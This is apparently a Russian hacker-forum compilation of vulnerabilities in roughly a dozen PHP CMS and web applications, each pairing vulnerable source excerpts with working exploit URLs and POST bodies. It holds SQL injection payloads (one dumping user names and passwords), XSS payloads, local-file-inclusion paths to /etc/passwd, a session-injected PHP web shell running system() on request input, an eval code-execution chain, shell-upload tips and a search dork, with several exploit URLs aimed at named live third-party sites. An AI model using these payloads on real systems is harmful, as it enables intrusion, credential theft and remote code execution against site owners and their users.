Croogo 1.2 (Геморная маленько) Пассивная XSS /admin/filemanager/browse?path=%22%3E%3Cscript%3Ealert();%3C/script%3E Сработает на админе если он авторизированный. ps Залить шелл легко (Права админа нужны) /admin/attachments Там я думаю догадаетесь.
Imer - Site Manager 3.5.0 sourceforge.net/projects/ism-imersiteman/ path disclosure http://localhost/imer/help/admin_common.php -------------- divcliente.php PHP: require_once './conecta.php'; require_once './suporte.php'; require_once './arrays.php'; if ($oplcat == '2'){ if ($ople == 'E'){ $pg_usuario = mysql_query("SELECT * FROM swb_usuarios WHERE ID = $idl LIMIT 1"); SQL rg=on http://localhost/imer/divcliente.php?oplcat=2&ople=E&idl=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,version(),34,35,36,37,38,39,40,41,42,43+--+ http://www.trudelmer.com.br/imer/divcliente.php?oplcat=2&ople=E&idl=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,version(),34,35,36,37,38,39,40,41,42,43+--+ -------------- noticia.php PHP: $pg_noticias = mysql_query("SELECT * FROM swb_noticias WHERE status = 'A' AND ID = $idl LIMIT 1"); SQL rg=on http://localhost/imer/noticia.php?conf_empresa=2&user=1&idl=-3+union+select+1,2,version(),4,5,6,7,8,9,10,11,12-- http://www.trudelmer.com.br/imer/noticia.php?conf_empresa=2&user=1&idl=-3+union+select+1,2,version(),4,5,6,7,8,9,10,11,12-- -------------- divhelp.php PHP: require_once './conecta.php'; require_once './suporte.php'; require_once './arrays.php'; if ($oplhlp == 'Y' || $oplhlp == 'N' || $oplhlp == 'R' || $oplhlp == 'L'){ if ($ople == 'E'){ $pg_userhelp = mysql_query("SELECT * FROM livehelp_users WHERE username = '$login' LIMIT 1"); SQL rg=on mq=off http://localhost/imer/divhelp.php?oplhlp=Y&ople=E&&login=hhhh'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,version(),31,32,33,34,35,36,37,38,39,40+limit+1+--+
PHP - STATS текущая версия 0.1.9.2 сайт: php-stats.com фаил : downloads.php условия magic_quotes_gpc = off уязвимый код : PHP: $result=sql_query("SELECT nome,descrizione,type,home,size,downloads,withinterface FROM $option[prefix]_downloads WHERE id='$id'"); .............................................................................................................. if(($mode!='download' && $downloads_withinterface=='YES') || $errorDownload===true) { .......................................... else {а вот собственно тут уже и имеем вывод на экран} { использование : Code: http://localhost/php-stats/download.php?mode=downloadd&id=999999'+union+select+1,2,2,3,4,5,"YES"+from+information_schema.tables%23 Пример для сайта производителей: Code: http://php-stats.com/stat/download.php?mode=downloadd&id=999999'+union+select+1,version(),2,3,4,5,"YES"%23 P.S 6й столбец должен быть обезательно задан как "YES" иначе не будет вывода
GAzie - Gestione Aziendale v4.0.13 http://sourceforge.net/projects/gazie/ Finance application written in PHP using a MySql database backend for small to medium enterprise. It lets you write invoices, manage stock, manage orders , accounting, etc. Send tax receipt to electronic cash register. pXSS http://localhost/gazie/modules/root/login_admin.php post Login=1>'><script>alert(1212)</script> Password=111111 actionflag=Login ---------------- modules/root/login_admin.php PHP: if (isset ($_POST['actionflag'])) { // checkUser(); $result = gaz_dbi_get_row ($gTables['admin'], "Login", $_POST['Login']); if (!empty ($result['lang'])){ $lang = $result['lang']; } else { $lang = 'italian'; } require("./lang.".$lang.".php"); library/include/mysql.lib.php PHP: function gaz_dbi_get_row( $table, $fnm, $fval) { global $link; $result = mysql_query("SELECT * FROM $table WHERE $fnm = '$fval'", $link); if (!$result) die (" Error gaz_dbi_get_row: ".mysql_error()); return mysql_fetch_array( $result); } SQL+LFI mq=off http://localhost/gazie/modules/root/login_admin.php post Login=111'+union+select+1,2,3,"../../../../../../../../../../boot.ini%00",5,6,7,8,9,10,11,12,13+--+ Password=111111 actionflag=Login
Andy's PHP Knowledgebase v0.94.2 http://aphpkb.org/ forgot_password.php PHP: <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <p>User Name:<br /> <input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /></p> pXSS http://localhost/aphpkb/forgot_password.php post username=1>"><script%20%0a%0d>alert(121212)%3B</script> ------------------------------------------------------------- keysearch.php PHP: if($_REQUEST['keyword_list']){ $keyword_list = escdata($_REQUEST['keyword_list']); } else { $keyword_list = 'nothing'; } ... // If it's not the first page, make a Previous button. if ($current_page != 1) { echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . ($start - $display) . '&np=' . $num_pages . '">Previous</a> '; } // Make all the numbered pages. for ($i = 1; $i <= $num_pages; $i++) { if ($i != $current_page) { echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . (($display * ($i - 1))) . '&np=' . $num_pages . '">' . $i . '</a> '; } else { echo $i . ' '; } } // If it's not the last page, make a Next button. if ($current_page != $num_pages) { echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . ($start + $display) . '&np=' . $num_pages . '">Next</a>'; } pXSS http://localhost/aphpkb/keysearch.php post keyword_list=1<script>alert(121212)</script> ------------------------------------------------------------- login.php PHP: <p>User Name:<br /><input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /></p> pXSS http://localhost/aphpkb/login.php post username=1>"><script%20%0a%0d>alert(121212)%3B</script> ------------------------------------------------------------- q.php PHP: $articledatae = escdata(xss_clean($_POST['article']) ); ... $articledata = stripslashes($articledatae); echo '<p>Article Details</p>'; echo "<p>Question:<br />$articledata</p>"; pXSS http://localhost/aphpkb/q.php post article=1<div+style+STYLE="width:expression(alert(121212))%3B">&aid=111&submit=Submit%20Question ------------------------------------------------------------- register.php PHP: <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <p>First Name:<br /> <input type="text" name="first_name" size="15" maxlength="15" value="<?php if (isset($_POST['first_name'])) echo $_POST['first_name']; ?>" /></p> <p>Last Name:<br /> <input type="text" name="last_name" size="30" maxlength="30" value="<?php if (isset($_POST['last_name'])) echo $_POST['last_name']; ?>" /></p> <p>Email Address:<br /> <input type="text" name="email" size="40" maxlength="40" value="<?php if (isset($_POST['email'])) echo $_POST['email']; ?>" /> </p> <p>User Name:<br /> <input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /> <small>Use only letters, numbers, and the underscore. Must be between 4 and 20 characters long.</small></p> pXSS http://localhost/aphpkb/register.php post first_name=1>"><script%20%0a%0d>alert(121212)%3B</script post last_name=1>"><script%20%0a%0d>alert(121212)%3B</script> post email=1>"><script%20%0a%0d>alert(121212)%3B</script> post username=1>"><script%20%0a%0d>alert(121212)%3B</script> ------------------------------------------------------------- saa.php PHP: $articledatae = escdata(xss_clean($_POST['article']) ); ... $articledata = stripslashes($articledatae); echo '<p>Article Details</p>'; if($titlee) { echo "<p>Title: $titlee</p>"; } echo "<p>Article:<br />$articledata</p>"; pXSS http://localhost/aphpkb/saa.php post article=1<div+style="width:expression(alert(121212))%3B">
Angora Guestbook v1.2.1 http://sourceforge.net/projects/aguestbook/ index.php PHP: // Language settings $langName = secureVar($_GET['l'], 'html'); if (! empty($langName)) $_SESSION['langName'] = $langName; if (empty($_SESSION['langName'])) $langName = $config['guestbookLang']; else $langName = $_SESSION['langName']; @include_once "languages/" . $langName . "/frontend.php"; classes/functions.php PHP: function secureVar($var, $type) { global $con; switch ($type) { case 'sql' : if (get_magic_quotes_gpc()) $var = stripslashes($var); if (function_exists("mysql_real_escape_string")) $var = mysql_real_escape_string($var); else $var = addslashes($var); break; case 'html' : $var = htmlspecialchars($var, ENT_QUOTES); break; default : if (get_magic_quotes_gpc()) $var = stripslashes($var); if (function_exists("mysql_real_escape_string")) $var = mysql_real_escape_string($var); else $var = addslashes($var); } return $var; } LFI mq=off http://localhost/angora_1_2_1/guestbook/index.php?l=../../../../../../../../boot.ini%00 ------------------------ admin/includes/content/phpinfo.php PHP: if (@$magic != "0xDEADBEEF") die("This file cannot be executed directly"); if (base64_decode($_SESSION['privilege']) != 1) { $error = new Error($lang['noPermission']); die($error->showError()); } ob_start(); phpinfo(); phpinfo http://localhost/angora_1_2_1/guestbook/admin/includes/content/phpinfo.php?magic=0xDEADBEEF&_SESSION[privilege]=MQ==
Продукт: mycroCMS Сайт: http://sourceforge.net/projects/mycrocms/ Path diclosing Code: [b]http://localhost/mycrocms/?entry_id='[/b] LFI Участок кода в /admin/admin.php: PHP: if ($admin=="error"){ include ("error.php"); }elseif ($userManager->isLoggedIn()) { if ($admin == "") { include ("dashboard.php"); } else { if (file_exists("admin/$admin.php")) { include ("admin/$admin.php"); } else { die("File admin/$admin.php does not exist!"); } } $userManager->setLastTime(time()); } else { if ($admin == "") { include ("dashboard.php"); } else { if (file_exists("admin/$admin.php")) { include ("admin/$admin.php"); } else { die("File admin/$admin.php does not exist!"); } } $userManager->setLastTime(time()); } Отсюда инклуд. Эксплуатация: Code: [b] http://localhost/mycrocms/?admin=../../../../../../etc/passwd%00 [/b] (права админа не нужны) SQL-Injection magiq_quotes=Off Смотрим в \include\Categories.php: PHP: function get_category_by_id($id) { global $sql, $categories; // use array if preloaded if (is_array($categories)) { $res = array_search_recursive('category_id', $id, $categories); } if (!is_array($res[0])) { $res = $sql->read('categories', 'category_id', $id); } return $res[0]; } Теперь ищем метод read в классе sql. Весь код кидать не буду, но фильтрации там нет. PHP: $sql = "SELECT * FROM `$tablep` " . $where . $order . $limit; $result = mysql_query($sql); Пример эксплуатации: Code: [b] http://localhost/mycrocms/?cat_id=1'+and+row(1,1)%3E(select+count(*),concat(version(),0x3a,floor(rand()*2)) +x+from+mysql.user+group+by+x+limit+1)+and+'a'='a [/b] Code Execution Заливка шелла в админке. Идём в меню Plugins, там есть стандартный плагин second для редактирования шаблонов (а на деле - любых файлов). Активируем его, затем идём на http://localhost/mycrocms/?plugin=second&page=themes и редактируем любой файл.
Pyrophobia CMS Product : http://sourceforge.net/projects/pyrophobia/ Version : Pyrophobia CMS 2.1.3.1 Active XSS 1. Forum -- заходим в форум -- отправляем сообщение с текстом ( "><script>alert("xss");</script> ) 2. PM -- Send User a PM -- отправляем текст ( '"/><script>alert("xss");</script> ) SQL injection MySQL Version : 5.0.45 --- Code: http://localhost/[version]/?act=downloads/browsecategory&cat=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1 Code: http://localhost/[version]/index.php?act=UCP&CODE=02&mssg=3'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1 На данном движке их много LFI milw0rm
BrewBlogger v2.3.1 http://www.brewblogger.net/ patch disclosure http://localhost/brewblogger/includes/plug-ins.inc.php ---------------------- index.php PHP: //image dir / SQL information and connect to MySQL server require_once ('Connections/config.php'); //choose SQL table and set up functions to user authentication and //navbar configuration for login/logout links require ('includes/authentication_nav.inc.php'); session_start(); includes\authentication_nav.inc.php $query_user = sprintf("SELECT * FROM users WHERE user_name = '%s'", $loginUsername); $user = mysql_query($query_user, $brewing) or die(mysql_error()); $row_user = mysql_fetch_assoc($user); $totalRows_user = mysql_num_rows($user); Blind SQL mq=off http://localhost/brewblogger/index.php?loginUsername='+UNION+SELECT+(select+*+from(select+*+from(select+name_const((version()),1)d)+as+t+join+(select+name_const((version()),1)e)b)a)+--+ ----------------------- includes/db_connect_log.inc.php PHP: /* set pagination variables */ if ($view == "limited") $display = 25; elseif ($view == "all") $display = 9999999; $pg = (isset($_REQUEST['pg']) && ctype_digit($_REQUEST['pg'])) ? $_REQUEST['pg'] : 1; $start = $display * $pg - $display; if (($row_pref['mode'] == "1") || (($row_pref['mode'] == "2") && ($filter == "all"))) { mysql_select_db($database_brewing, $brewing); $query_result = "SELECT count(*) FROM brewing"; if ($style != "all") $query_result .= " WHERE brewStyle='$style' AND"; else $query_result .= " WHERE"; $query_result .= " NOT brewArchive='Y'"; $result = mysql_query($query_result, $brewing) or die(mysql_error()); $total = mysql_result($result, 0); $query_log = "SELECT * FROM brewing"; if ($style != "all") $query_log .= " WHERE brewStyle='$style' AND"; else $query_log .= " WHERE"; $query_log .= " NOT brewArchive='Y'"; $query_log .= " ORDER BY $sort $dir LIMIT $start, $display"; $sort слешируется ранее, PHP: includes/url_variables.inc.php $sort = "brewDate"; if (isset($_GET['sort'])) { $sort = (get_magic_quotes_gpc()) ? $_GET['sort'] : addslashes($_GET['sort']); } $display никак не фильтруется. Хочется получить limit union select но мешает order by, поэтому только Blind SQL http://localhost/brewblogger/index.php?page=brewBlogList&&sort=(select+*+from(select+*+from(select+name_const((version()),1)d)+as+t+join+(select+name_const((version()),1)e)b)a) ---------------------- sections.entry.inc.php PHP: $dbTable = "brewing"; if (isset($_GET['dbTable'])) { $dbTable = (get_magic_quotes_gpc()) ? $_GET['dbTable'] : addslashes($_GET['dbTable']); } if ($action == "default") { $style = "default"; if (isset($_GET['style'])) { $style = (get_magic_quotes_gpc()) ? $_GET['style'] : addslashes($_GET['style']); } } else $style = $_POST['style']; if (($action == "verify") || ($action == "print")) { $name = $_POST['name']; $address = $_POST['address']; $city = $_POST['city']; $state = $_POST['state']; $zip = $_POST['zip']; $homePhone = $_POST['homePhone']; $workPhone = $_POST['workPhone']; $email = $_POST['email']; $brewClub = $_POST['brewClub']; $brewName = $_POST['brewName']; $still = $_POST['still']; $dry = $_POST['dry']; $hydromel = $_POST['hydromel']; $petillant = $_POST['petillant']; $semi = $_POST['semi']; $standard = $_POST['standard']; $sweet = $_POST['sweet']; $sparkling = $_POST['sparkling']; $sack = $_POST['sack']; $special = $_POST['special']; $waterTreatment = $_POST['waterTreatment']; $yeastLiquid = $_POST['yeastLiquid']; $yeastDried = $_POST['yeastDried']; $starter = $_POST['starter']; $yeastNutrients = $_POST['yeastNutrients']; $carbonation = $_POST['carbonation']; $volumeC02 = $_POST['volumeC02']; $primingSugar = $_POST['primingSugar']; $bottlingDate = $_POST['bottlingDate']; $finingsType = $_POST['finingsType']; $finingsAmount = $_POST['finingsAmount']; } mysql_select_db($database_brewing, $brewing); $query_log = sprintf("SELECT * FROM $dbTable WHERE id = '%s'", $id); $log = mysql_query($query_log, $brewing) or die(mysql_error()); $row_log = mysql_fetch_assoc($log); $totalRows_log = mysql_num_rows($log); $query_style1 = sprintf("SELECT * FROM styles WHERE brewStyle = '%s'", $style); SQL mq=off http://localhost/brewblogger/sections/entry.inc.php?action=verify&style=default&id=default post style=-1' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,unhex(hex(concat_ws(0x3a,user_name,password))) from users -- pXSS для полей name address city state zip homePhone workPhone email brewClub brewName still dry hydromel petillant semi standard sweet sparkling sack special waterTreatment yeastLiquid yeastDried starter yeastNutrients carbonation volumeC02 primingSugar bottlingDate finingsType finingsAmount по типу http://localhost/brewblogger/sections/entry.inc.php?action=verify&style=default&id=default post city=<script>alert(121212)</script>
php-addressbook v5.4.6 - r276 http://sourceforge.net/projects/php-addressbook/ group.php PHP: echo "<div class='msgbox'>Users added.<br /><i>Go to <a href='./?group=$group_name'>group page \"$group_name\"</a>.</i></div>"; ... <form accept-charset="utf-8" method="post" action="<?php echo $_SERVER['PHP_SELF'];?>"> pXSS http://localhost/addressbookv5.4.6/index.php?group=1<script>alert(121212)</script> pXSS mq=off http://localhost/addressbookv5.4.6/group.php/>"><script>alert(121212)</script> --------------------- include/dbconnect.php PHP: $get_vars = array( 'id' ); foreach($get_vars as $get_var) { if(isset($_GET[$get_var])) { ${$get_var} = intval($_GET[$get_var]); } elseif(isset($_POST[$get_var])) { ${$get_var} = intval($_POST[$get_var]); } else { ${$get_var} = null; } } echo $id, "<br />"; // Copy only used variables into global space. $get_vars = array( 'searchstring', 'alphabet', 'group', 'resultnumber' , 'submit', 'update', 'delete' , 'new', 'add', 'remove', 'edit' ); foreach($get_vars as $get_var) { if(isset($_GET[$get_var])) { ${$get_var} = mysql_real_escape_string($_GET[$get_var], $db); } elseif(isset($_POST[$get_var])) { ${$get_var} = mysql_real_escape_string($_POST[$get_var], $db); } else { ${$get_var} = null; } } ... // To run the script on systeme with "register_globals" disabled, // import all variables in a bit secured way: Remove HTML Tags foreach($_REQUEST as $key => $value) { // Allow all tags in headers and footers if($key == "group_header" || $key == "group_footer"){ ${$key} = $value; // Handle arrays } elseif(is_array($value)) { foreach($value as $entry) { ${$key}[] = strip_tags($entry); } // Handle the rest } else { // ${$key} = htmlspecialchars($value); --chatelao-20071121, doesn't work with Chinese Characters ${$key} = strip_tags($value); } // TBD: prevent SQL-Injection } ... // ------------------- Group query handling ------------------------ // $select_groups = "SELECT groups.* , parent_groups.group_name parent_name , parent_groups.group_id parent_id FROM $table_groups AS groups LEFT JOIN $table_groups AS parent_groups ON groups.group_parent_id = parent_groups.group_id"; group.php PHP: // Open for Editing else if($edit || $id) { if($edit) $id = $selected[0]; if(! $read_only) { $result = mysql_query("$select_groups WHERE groups.group_id=$id",$db); SQL http://localhost/addressbookv5.4.6/group.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9+--+ ------------------------- edit.php PHP: else if($id) { if(! $read_only) { $result = mysql_query("SELECT * FROM $base_from_where AND $table.id=$id",$db); SQL http://localhost/addressbookv5.4.6/edit.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
cms chicomas Ver : 2.0.4 http://sourceforge.net/projects/chicomas/ functions.php PHP: function SetLanguage() { global $defaultlanguage; $obj_language = new CLanguage(); $obj_languagearray = new CLanguageArray(); $obj_languageengine = new CLanguageEngine(); if (!$_REQUEST['lang']){ // No change request of language if (!session_is_registered("lang")){ //No Registered $lang = $defaultlanguage; session_register("lang"); $_SESSION['lang'] = $lang; } else{ //Registered } } else{ //Change request of language $lang = $_REQUEST['lang']; $obj_language = $obj_languageengine->GetLanguage($lang); if ($obj_language!=null){ if (session_is_registered("lang")){ $_SESSION['lang'] = $lang; } else{ if ($lang =="") $lang = $defaultlanguage; session_register("lang"); } } } $lang = $_SESSION['lang']; switch (strtolower($lang)){ default: case "tr": $charset = "iso-8859-9"; break; case "en": $charset = "iso-8859-1"; break; case "de": $charset = "iso-8859-1"; break; } if (session_is_registered("charset")){ $_SESSION['charset'] = $charset; } else{ if ($charset =="") $charset = "iso-8859-9"; session_register("charset"); } //Include Language File include("languages/".strtolower($_SESSION['lang'])."/language.php"); } Если $obj_language = $obj_languageengine->GetLanguage($lang); вернет не пустой результат, значение $lang = $_REQUEST['lang']; занесется в сессию и затем проинклудится include("languages/".strtolower($_SESSION['lang'])."/language.php"); смотрим objects/obj_languages.php PHP: class CLanguageEngine { function GetLanguages($active){ $o_dataaccess = new CDataAccess(); return $o_dataaccess->GetLanguages($active); objects/obj_dataaccess.php PHP: function GetLanguage($lang) { $sql = "SELECT * FROM languages "; $sql .= "WHERE lang='".strtolower($lang)."' "; $sql .= "AND active='1'"; //echo "SQL:".$sql."<br>"; $db = new db(); $db->db_connect(); if ($db->is_connected()){ $db->db_query($sql); while ($row = $db->get_row()) { $o_language = new CLanguage($row); } $db->db_disconnect(); } return $o_language; } при mq=off SQL http://localhost/chicomas/index.php?lang=en'+union+select+1,2,3,4,version(),6+--+ SQL+LFI http://localhost/chicomas/index.php?lang=/../../../../../../../boot.ini%00'+union+select+1,2,3,4,5,6+--+ Shell если нашли сессию, получаем шелл, например так: (используем два разных браузера) opera, заливаем шелл в сессию http://localhost/chicomas/index.php?lang='+union+select+1,<?if($_GET[pass])system($_GET[pass]);?>,3,4,5,6+--+ firefox, инклудим сессию http://localhost/chicomas/index.php?lang=/../../../../../../../Server/PHP/TMP/sess_be2c81ce822253b08bfa181ee5b7cf9d%00'+union+select+1,<?if($_GET[pass])system($_GET[pass]);?>,3,4,version(),6+--+&pass=dir ------------------- tools/mysqlbackuppro/index.php PHP: /* * Locale Setting */ $locale = gonxlocale::init(); if (!isset($locale) or $locale=="") { $locale = $GonxAdmin["locale"]; } require_once("locale/".$locale.".php"); tools/mysqlbackuppro/libs/locale.class.php PHP: class gonxlocale{ /** * Constructor * @access protected */ function locale(){ } /** * * @access public * @return void **/ function init(){ global $locale,$GonxAdmin,$HTTP_SESSION_VARS; if (session_is_registered('gonxlocale') and !isset($_GET["locale"])) { $locale = $HTTP_SESSION_VARS["gonxlocale"]; } elseif (!isset($_GET["locale"])) { $locale = $GonxAdmin["locale"]; session_register('gonxlocale'); $gonxlocale = $locale; } elseif (isset($_GET["locale"])) { if (is_file("locale/".$_GET["locale"].".php")) { session_register('gonxlocale'); $HTTP_SESSION_VARS["gonxlocale"] = $_GET["locale"]; } } return $locale; } LFI mq=off http://localhost/chicomas/tools/mysqlbackuppro/index.php?locale=../../../../../../boot.ini%00
AdaptCMS Lite v1.5 - NEW www.adaptcms.com pXSS mq=off http://localhost/adaptcms_lite_1.5/index.php post skin=1>"><script>alert(121212);</script> http://localhost/adaptcms_lite_1.5/?cat=1'+><script>alert(121212);</script> http://localhost/adaptcms_lite_1.5/index.php?view=redirect&url=1'+><script>alert(121212);</script> http://localhost/adaptcms_lite_1.5/index.php/>'><script>alert(121212)</script> ----------------------- index.php PHP: $_GET['id'] = str_replace("/","",stripslashes(check($_GET['id']))); $sql = mysql_query("SELECT * FROM ".$pre."pages WHERE url = '".$_GET['id']."'"); functions.php PHP: function check($val) { // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed // this prevents some character re-spacing such as <java\0script> // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs $val = preg_replace('/([\x00-\x08][\x0b-\x0c][\x0e-\x20])/', '', $val); // straight replacements, the user should never need these since they're normal characters // this prevents like <IMG SRC=@avascript:alert('XSS')> $search = 'abcdefghijklmnopqrstuvwxyz'; $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; $search .= '1234567890!@#$%^&*()'; $search .= '~`";:?+/={}[]-_|\'\\'; for ($i = 0; $i < strlen($search); $i++) { // ;? matches the ;, which is optional // 0{0,7} matches any padded zeros, which are optional and go up to 8 chars // @ @ search for the hex values $val = preg_replace('/(&#[x|X]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ; // @ @ 0{0,7} matches '0' zero to seven times $val = preg_replace('/(�{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ; } // now the only remaining whitespace attacks are \t, \n, and \r $ra1 = Array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base', 'img'); $ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload'); $ra = array_merge($ra1, $ra2); $found = true; // keep replacing as long as the previous round replaced something while ($found == true) { $val_before = $val; for ($i = 0; $i < sizeof($ra); $i++) { $pattern = '/'; for ($j = 0; $j < strlen($ra[$i]); $j++) { if ($j > 0) { $pattern .= '('; $pattern .= '(&#[x|X]0{0,8}([9][a][b]);?)?'; $pattern .= '|(�{0,8}([9][10][13]);?)?'; $pattern .= ')?'; } $pattern .= $ra[$i][$j]; } $pattern .= '/i'; $replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag $val = preg_replace($pattern, $replacement, $val); // filter out the hex tags if ($val_before == $val) { // no replacements were made, so exit the loop $found = false; } } } return strip_tags($val, "<p><a><font><b><i><u><span><em><div><li><ul><ol><center><blockquote>"); } SQL mq=off http://localhost/adaptcms_lite_1.5/?view=page&id=-1'+union+select+1,user(),3,version(),5,6+--+ ------------------------------------- index.php PHP: ... if ($_GET['field'] or $_GET['data']) { $sql = mysql_query("SELECT * FROM ".$pre."fielddata WHERE".$fddata." ORDER BY `id` DESC".$lim); } else { if ($_GET['abc']) { if ($_GET['cat']) { $sql = mysql_query("SELECT * FROM ".$pre."articles WHERE section = '".$_GET['cat']."' AND ver = '' ".$abc.$adate."ORDER BY `id` DESC".$lim); } else { $sql = mysql_query("SELECT * FROM ".$pre."articles WHERE ver = '' ".$abc.$adate."ORDER BY `id` DESC".$lim); } } else { if ($_GET['cat']) { $sql = mysql_query("SELECT * FROM ".$pre."articles WHERE section = '".$_GET['cat']."' AND ver = ''".$adate." ORDER BY `id` DESC".$lim); } else { $sql = mysql_query("SELECT * FROM ".$pre."articles WHERE ver = ''".$adate." ORDER BY `id` DESC".$lim); } } } while($r = mysql_fetch_array($sql)) { unset($data, $datas, $pab, $rab, $name1, $link1, $n, $m, $y, $x, $i, $id, $name, $relations_id, $relations_sec, $s, $fetch, $get, $dats, $fname, $lid, $lids, $b, $sqlst, $k, $data23, $check); ... $pab[0] = "{link}"; $pab[1] = "{date}"; $pab[2] = "{story}"; $pab[3] = "{comments}"; $pab[4] = "{cnum}"; $pab[5] = "{pcomment}"; $pab[6] = "{author}"; $pab[7] = "{section}"; $pab[8] = "{cat}"; $pab[9] = "{url}"; $pab[10] = "{title}"; .... $pab[30] = "{".$r[section]."_name}"; $pab[31] = "{".$r[section]."_username}"; $pab[32] = "{".$r[section]."_id}"; $pab[33] = "{".$r[section]."_views}"; $pab[34] = "{".$r[section]."_votes}"; $pab[35] = "{".$r[section]."_social_icons}"; ... // start - custom fields $name = "";$data = "";$row = ""; $sql_cf = mysql_query("SELECT * FROM ".$pre."fields WHERE cat = '".$r[section]."' OR cat = 'user-profile'"); while ($row = mysql_fetch_array($sql_cf)) { $name = "$row[name]"; $data = mysql_fetch_row(mysql_query("SELECT data FROM ".$pre."fielddata WHERE fname = '".$name."' AND aid = '".$r[id]."'")); $fdata[$name] = $data[0]; if ($data[0]) { $n = $n + 1; $pab[$n] = "{".$name."}"; $n = $n + 1; $pab[$n] = "{".$r[section]."_".$name."}"; $m = $m + 1; if ($row[type] == "textarea") { $rab[$m] = parse_text($data[0]); $m = $m + 1; $rab[$m] = parse_text($data[0]); } else { $rab[$m] = stripslashes(html_entity_decode($data[0])); $m = $m + 1; $rab[$m] = stripslashes(html_entity_decode($data[0])); } } else { $n = $n + 1; $pab[$n] = "{".$name."}"; $n = $n + 1; $pab[$n] = "{".$r[section]."_".$name."}"; $m = $m + 1; $rab[$m] = ""; $m = $m + 1; $rab[$m] = ""; } } // end - custom fields ... eval (" ?>" . str_replace($pab, $rab, stripslashes($temp[0])) . " <?php "); ... Выбирается шаблон ($temp[0]) и в нем поля (массив $pab) заменяются на конкретное содержание (массив $rab). Чтобы выполнить свою команду, нужно добавить в массивы по элементу, где $pab[400] = "{cat}"; ( такое поле есть в шаблоне $temp[0] ) $rab[400] = "php code"; (наша команда или скрипт) этому препятсвует unset unset($data, $datas, $pab, $rab, ...); Приходится использовать unset багу. сформируем hash_del_key для php5 для pab = 2090607416 для rab = 2090679290 Eval register_globals = On версия php, уязвимая для UNSET WHACKING http://localhost/adaptcms_lite_1.5/?view=list&pab[400]=cat&rab[400]=<?php phpinfo(); ?>&2090607416[400]=1&2090679290[400]=1 http://localhost/adaptcms_lite_1.5/?view=list&pab[400]=cat&rab[400]=<?php phpinfo(); ?>&2090679290=1
cms jetbox http://sourceforge.net/projects/jetboxone/ dork:"Powered by Jetbox CMS ™" Поддерживает УРЛ стандартного типа, но работает со своим PHP: if ($use_standard_url_method==true) { $url = explode("/",$url_to_split[1]); // Splits URL into array --------------------------- phpinfo http://localhost/jetbox/includes/phpinfo.php http://www.js.mlc.edu.tw/php/jetbox/includes/phpinfo.php --------------------------- index.php PHP: if (isset($view)) { $dodefaultpage=false; $sql2="SELECT * FROM navigation WHERE view_name='".$view."'"; $r2 = mysql_prefix_query($sql2) or die(mysql_error()." q: ".$sql2."<br /> Line: ".__LINE__." <br/>File: ".__FILE__); if ($ra2 = mysql_fetch_array($r2)){ //echo $ra2["file_name"]; include($ra2["file_name"]); } SQL+LFI mq=off rg=on http://localhost/jetbox/?view=1'+union+select+1,"/boot.ini%",3,4,5,6,7,8,9,10,11,12+--+ http://www.egyptiancorner.org/ec/view/1'+union+select+1,0x2F6574632F706173737764,3,4,5,6,7,8,9,10,11,12+--+ SQL+RFI magic_quotes_gpc = Off register_globals = On allow_url_include = On 